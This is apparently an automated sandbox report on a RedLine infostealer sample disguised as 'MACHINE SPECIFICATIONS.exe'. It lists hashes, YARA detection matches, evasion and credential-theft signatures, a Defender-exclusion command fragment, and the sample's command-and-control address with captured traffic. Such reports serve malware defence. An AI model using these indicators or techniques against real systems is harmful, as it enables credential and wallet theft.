Edit tour

Windows Analysis Report
MACHINE SPECIFICATIONS.exe

Overview

General Information

Sample Name:	MACHINE SPECIFICATIONS.exe
Analysis ID:	634065
MD5:	1ac0e9eee0868534cfca46127f5d5753
SHA1:	69b9f3a1be891e82a3a0b2d0286da36ea2b1c9ef
SHA256:	e7913058bbde80f5b9088b0b41a132b0d9c09e1973f9bf2199d355cf7620bf12
Tags:	exe
Infos:

Detection

RedLine

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Yara detected RedLine Stealer

Found malware configuration

Yara detected UAC Bypass using CMSTP

Multi AV Scanner detection for submitted file

Icon mismatch, binary includes an icon from a different legit application in order to fool users

Malicious sample detected (through community Yara rule)

Yara detected AntiVM3

Antivirus / Scanner detection for submitted sample

Tries to steal Crypto Currency Wallets

.NET source code references suspicious native API functions

Contains functionality to hide user accounts

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses known network protocols on non-standard ports

Yara detected Generic Downloader

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Found many strings related to Crypto-Wallets (likely being stolen)

Tries to harvest and steal browser information (history, passwords, etc)

Queries the volume information (name, serial number etc) of a device

Yara signature match

May sleep (evasive loops) to hinder dynamic analysis

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Yara detected Credential Stealer

HTTP GET or POST without a user agent

Contains long sleeps (>= 3 min)

Enables debug privileges

Is looking for software installed on the system

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

AV process strings found (often used to terminate AV products)

Sample file is different than original file name gathered from version info

PE file contains strange resources

Detected TCP or UDP traffic on non-standard ports

Binary contains a suspicious time stamp

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

System is w10x64

MACHINE SPECIFICATIONS.exe (PID: 5616 cmdline: "C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe" MD5: 1AC0E9EEE0868534CFCA46127F5D5753)

MACHINE SPECIFICATIONS.exe (PID: 492 cmdline: C:\Users\user\Desktop\MACHINE SPECIFICATIONS.exe MD5: 1AC0E9EEE0868534CFCA46127F5D5753)

conhost.exe (PID: 5920 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

cleanup

Malware Configuration

Threatname: RedLine

{"C2 url": ["185.222.58.90:17910"], "Bot Id": "Lxx"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
dump.pcap	JoeSecurity_RedLine_1	Yara detected RedLine Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000003.00000002.364483156.0000000002D6F000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000003.00000000.259611278.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000003.00000000.259611278.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000000.258987362.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000003.00000000.258987362.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.283378936.00000000042A5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000000.00000002.283378936.00000000042A5000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000000.258444811.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000003.00000000.258444811.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.283307235.000000000425A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000000.00000002.283307235.000000000425A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000002.363334642.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000003.00000002.363334642.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000003.00000000.260395549.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000003.00000000.260395549.0000000000402000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000002.283190056.000000000420A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000000.00000002.283190056.000000000420A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
00000000.00000002.283190056.000000000420A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
00000000.00000002.283190056.000000000420A000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: MACHINE SPECIFICATIONS.exe PID: 5616	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: MACHINE SPECIFICATIONS.exe PID: 5616	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
Process Memory Space: MACHINE SPECIFICATIONS.exe PID: 5616	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: MACHINE SPECIFICATIONS.exe PID: 5616	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: MACHINE SPECIFICATIONS.exe PID: 492	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
Process Memory Space: MACHINE SPECIFICATIONS.exe PID: 492	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 20 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
3.2.MACHINE SPECIFICATIONS.exe.400000.1.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
3.2.MACHINE SPECIFICATIONS.exe.400000.1.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
3.2.MACHINE SPECIFICATIONS.exe.400000.1.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.2.MACHINE SPECIFICATIONS.exe.400000.1.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165e6:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165c7:$v2_6: GetUpdates
3.0.MACHINE SPECIFICATIONS.exe.400000.11.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
3.0.MACHINE SPECIFICATIONS.exe.400000.11.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
3.0.MACHINE SPECIFICATIONS.exe.400000.11.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.0.MACHINE SPECIFICATIONS.exe.400000.11.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165e6:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165c7:$v2_6: GetUpdates
3.0.MACHINE SPECIFICATIONS.exe.400000.7.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
3.0.MACHINE SPECIFICATIONS.exe.400000.7.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
3.0.MACHINE SPECIFICATIONS.exe.400000.7.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.0.MACHINE SPECIFICATIONS.exe.400000.7.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165e6:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165c7:$v2_6: GetUpdates
0.2.MACHINE SPECIFICATIONS.exe.423a5d8.2.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.MACHINE SPECIFICATIONS.exe.423a5d8.2.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.MACHINE SPECIFICATIONS.exe.423a5d8.2.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.MACHINE SPECIFICATIONS.exe.423a5d8.2.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165e6:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165c7:$v2_6: GetUpdates
3.0.MACHINE SPECIFICATIONS.exe.400000.5.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
3.0.MACHINE SPECIFICATIONS.exe.400000.5.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
3.0.MACHINE SPECIFICATIONS.exe.400000.5.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.0.MACHINE SPECIFICATIONS.exe.400000.5.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165e6:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165c7:$v2_6: GetUpdates
3.0.MACHINE SPECIFICATIONS.exe.400000.9.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
3.0.MACHINE SPECIFICATIONS.exe.400000.9.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
3.0.MACHINE SPECIFICATIONS.exe.400000.9.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.0.MACHINE SPECIFICATIONS.exe.400000.9.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165e6:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165c7:$v2_6: GetUpdates
0.2.MACHINE SPECIFICATIONS.exe.423a5d8.2.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.MACHINE SPECIFICATIONS.exe.423a5d8.2.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.MACHINE SPECIFICATIONS.exe.423a5d8.2.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0xe68a:$u7: RunPE 0x11d41:$u8: DownloadAndEx 0x7330:$pat14: , CommandLine: 0x11279:$v2_1: ListOfProcesses 0xe88b:$v2_2: get_ScanVPN 0xe92e:$v2_2: get_ScanFTP 0xf61e:$v2_2: get_ScanDiscord 0x1060c:$v2_2: get_ScanSteam 0x10628:$v2_2: get_ScanTelegram 0x106ce:$v2_2: get_ScanScreen 0x11416:$v2_2: get_ScanChromeBrowsersPaths 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths 0x11709:$v2_2: get_ScanBrowsers 0x117ca:$v2_2: get_ScannedWallets 0x117f0:$v2_2: get_ScanWallets 0x11810:$v2_3: GetArguments 0xfed9:$v2_4: VerifyUpdate 0x147e6:$v2_4: VerifyUpdate 0x11bca:$v2_5: VerifyScanRequest 0x112c6:$v2_6: GetUpdates 0x147c7:$v2_6: GetUpdates
0.2.MACHINE SPECIFICATIONS.exe.425a5f8.4.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.MACHINE SPECIFICATIONS.exe.425a5f8.4.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.MACHINE SPECIFICATIONS.exe.425a5f8.4.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0xe68a:$u7: RunPE 0x11d41:$u8: DownloadAndEx 0x7330:$pat14: , CommandLine: 0x11279:$v2_1: ListOfProcesses 0xe88b:$v2_2: get_ScanVPN 0xe92e:$v2_2: get_ScanFTP 0xf61e:$v2_2: get_ScanDiscord 0x1060c:$v2_2: get_ScanSteam 0x10628:$v2_2: get_ScanTelegram 0x106ce:$v2_2: get_ScanScreen 0x11416:$v2_2: get_ScanChromeBrowsersPaths 0x1144e:$v2_2: get_ScanGeckoBrowsersPaths 0x11709:$v2_2: get_ScanBrowsers 0x117ca:$v2_2: get_ScannedWallets 0x117f0:$v2_2: get_ScanWallets 0x11810:$v2_3: GetArguments 0xfed9:$v2_4: VerifyUpdate 0x147e6:$v2_4: VerifyUpdate 0x11bca:$v2_5: VerifyScanRequest 0x112c6:$v2_6: GetUpdates 0x147c7:$v2_6: GetUpdates
3.0.MACHINE SPECIFICATIONS.exe.400000.13.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
3.0.MACHINE SPECIFICATIONS.exe.400000.13.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
3.0.MACHINE SPECIFICATIONS.exe.400000.13.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
3.0.MACHINE SPECIFICATIONS.exe.400000.13.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165e6:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165c7:$v2_6: GetUpdates
0.2.MACHINE SPECIFICATIONS.exe.4215448.3.raw.unpack	JoeSecurity_UACBypassusingCMSTP	Yara detected UAC Bypass using CMSTP	Joe Security
0.2.MACHINE SPECIFICATIONS.exe.4215448.3.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.MACHINE SPECIFICATIONS.exe.4215448.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.MACHINE SPECIFICATIONS.exe.4215448.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.MACHINE SPECIFICATIONS.exe.4215448.3.raw.unpack	INDICATOR_SUSPICIOUS_DisableWinDefender	Detects executables containing artifcats associated with disabling Widnows Defender	ditekSHen	0x2418d:$e1: Microsoft\Windows Defender\Exclusions\Paths 0x241c4:$e2: Add-MpPreference -ExclusionPath
0.2.MACHINE SPECIFICATIONS.exe.4215448.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM	Detects executables embedding command execution via IExecuteCommand COM object	ditekSHen	0x24059:$r1: Classes\Folder\shell\open\command 0x24080:$k1: DelegateExecute 0x23fcc:$s1: /EXEFilename "{0} 0x23fdf:$s2: /WindowState "" 0x24d47:$s2: /WindowState "" 0x23ff4:$s3: /PriorityClass ""32"" /CommandLine " 0x24d5a:$s3: /PriorityClass ""32"" /CommandLine " 0x2401a:$s4: /StartDirectory " 0x24d80:$s4: /StartDirectory " 0x2402d:$s5: /RunAs 0x24d93:$s5: /RunAs
0.2.MACHINE SPECIFICATIONS.exe.4215448.3.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x3561a:$u7: RunPE 0x38cd1:$u8: DownloadAndEx 0x2e2c0:$pat14: , CommandLine: 0x38209:$v2_1: ListOfProcesses 0x3581b:$v2_2: get_ScanVPN 0x358be:$v2_2: get_ScanFTP 0x365ae:$v2_2: get_ScanDiscord 0x3759c:$v2_2: get_ScanSteam 0x375b8:$v2_2: get_ScanTelegram 0x3765e:$v2_2: get_ScanScreen 0x383a6:$v2_2: get_ScanChromeBrowsersPaths 0x383de:$v2_2: get_ScanGeckoBrowsersPaths 0x38699:$v2_2: get_ScanBrowsers 0x3875a:$v2_2: get_ScannedWallets 0x38780:$v2_2: get_ScanWallets 0x387a0:$v2_3: GetArguments 0x36e69:$v2_4: VerifyUpdate 0x3b776:$v2_4: VerifyUpdate 0x38b5a:$v2_5: VerifyScanRequest 0x38256:$v2_6: GetUpdates 0x3b757:$v2_6: GetUpdates
0.2.MACHINE SPECIFICATIONS.exe.425a5f8.4.raw.unpack	JoeSecurity_RedLine	Yara detected RedLine Stealer	Joe Security
0.2.MACHINE SPECIFICATIONS.exe.425a5f8.4.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.MACHINE SPECIFICATIONS.exe.425a5f8.4.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.MACHINE SPECIFICATIONS.exe.425a5f8.4.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1048a:$u7: RunPE 0x13b41:$u8: DownloadAndEx 0x9130:$pat14: , CommandLine: 0x13079:$v2_1: ListOfProcesses 0x1068b:$v2_2: get_ScanVPN 0x1072e:$v2_2: get_ScanFTP 0x1141e:$v2_2: get_ScanDiscord 0x1240c:$v2_2: get_ScanSteam 0x12428:$v2_2: get_ScanTelegram 0x124ce:$v2_2: get_ScanScreen 0x13216:$v2_2: get_ScanChromeBrowsersPaths 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths 0x13509:$v2_2: get_ScanBrowsers 0x135ca:$v2_2: get_ScannedWallets 0x135f0:$v2_2: get_ScanWallets 0x13610:$v2_3: GetArguments 0x11cd9:$v2_4: VerifyUpdate 0x165e6:$v2_4: VerifyUpdate 0x139ca:$v2_5: VerifyScanRequest 0x130c6:$v2_6: GetUpdates 0x165c7:$v2_6: GetUpdates
Click to see the 40 entries

HTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.58.90:17910Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: api.ip.sb

System Summary

Malicious sample detected (through community Yara rule)

Source: 3.2.MACHINE SPECIFICATIONS.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 3.0.MACHINE SPECIFICATIONS.exe.400000.11.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 3.0.MACHINE SPECIFICATIONS.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.MACHINE SPECIFICATIONS.exe.423a5d8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 3.0.MACHINE SPECIFICATIONS.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 3.0.MACHINE SPECIFICATIONS.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.MACHINE SPECIFICATIONS.exe.423a5d8.2.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.MACHINE SPECIFICATIONS.exe.425a5f8.4.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 3.0.MACHINE SPECIFICATIONS.exe.400000.13.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.MACHINE SPECIFICATIONS.exe.4215448.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables containing artifcats associated with disabling Widnows Defender Author: ditekSHen
Source: 0.2.MACHINE SPECIFICATIONS.exe.4215448.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
Source: 0.2.MACHINE SPECIFICATIONS.exe.4215448.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.MACHINE SPECIFICATIONS.exe.425a5f8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen

Source: 3.2.MACHINE SPECIFICATIONS.exe.400000.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 3.0.MACHINE SPECIFICATIONS.exe.400000.11.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 3.0.MACHINE SPECIFICATIONS.exe.400000.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.MACHINE SPECIFICATIONS.exe.423a5d8.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 3.0.MACHINE SPECIFICATIONS.exe.400000.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 3.0.MACHINE SPECIFICATIONS.exe.400000.9.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.MACHINE SPECIFICATIONS.exe.423a5d8.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.MACHINE SPECIFICATIONS.exe.425a5f8.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 3.0.MACHINE SPECIFICATIONS.exe.400000.13.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.MACHINE SPECIFICATIONS.exe.4215448.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_DisableWinDefender author = ditekSHen, description = Detects executables containing artifcats associated with disabling Widnows Defender
Source: 0.2.MACHINE SPECIFICATIONS.exe.4215448.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_RegKeyComb_IExecuteCommandCOM author = ditekSHen, description = Detects executables embedding command execution via IExecuteCommand COM object
Source: 0.2.MACHINE SPECIFICATIONS.exe.4215448.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
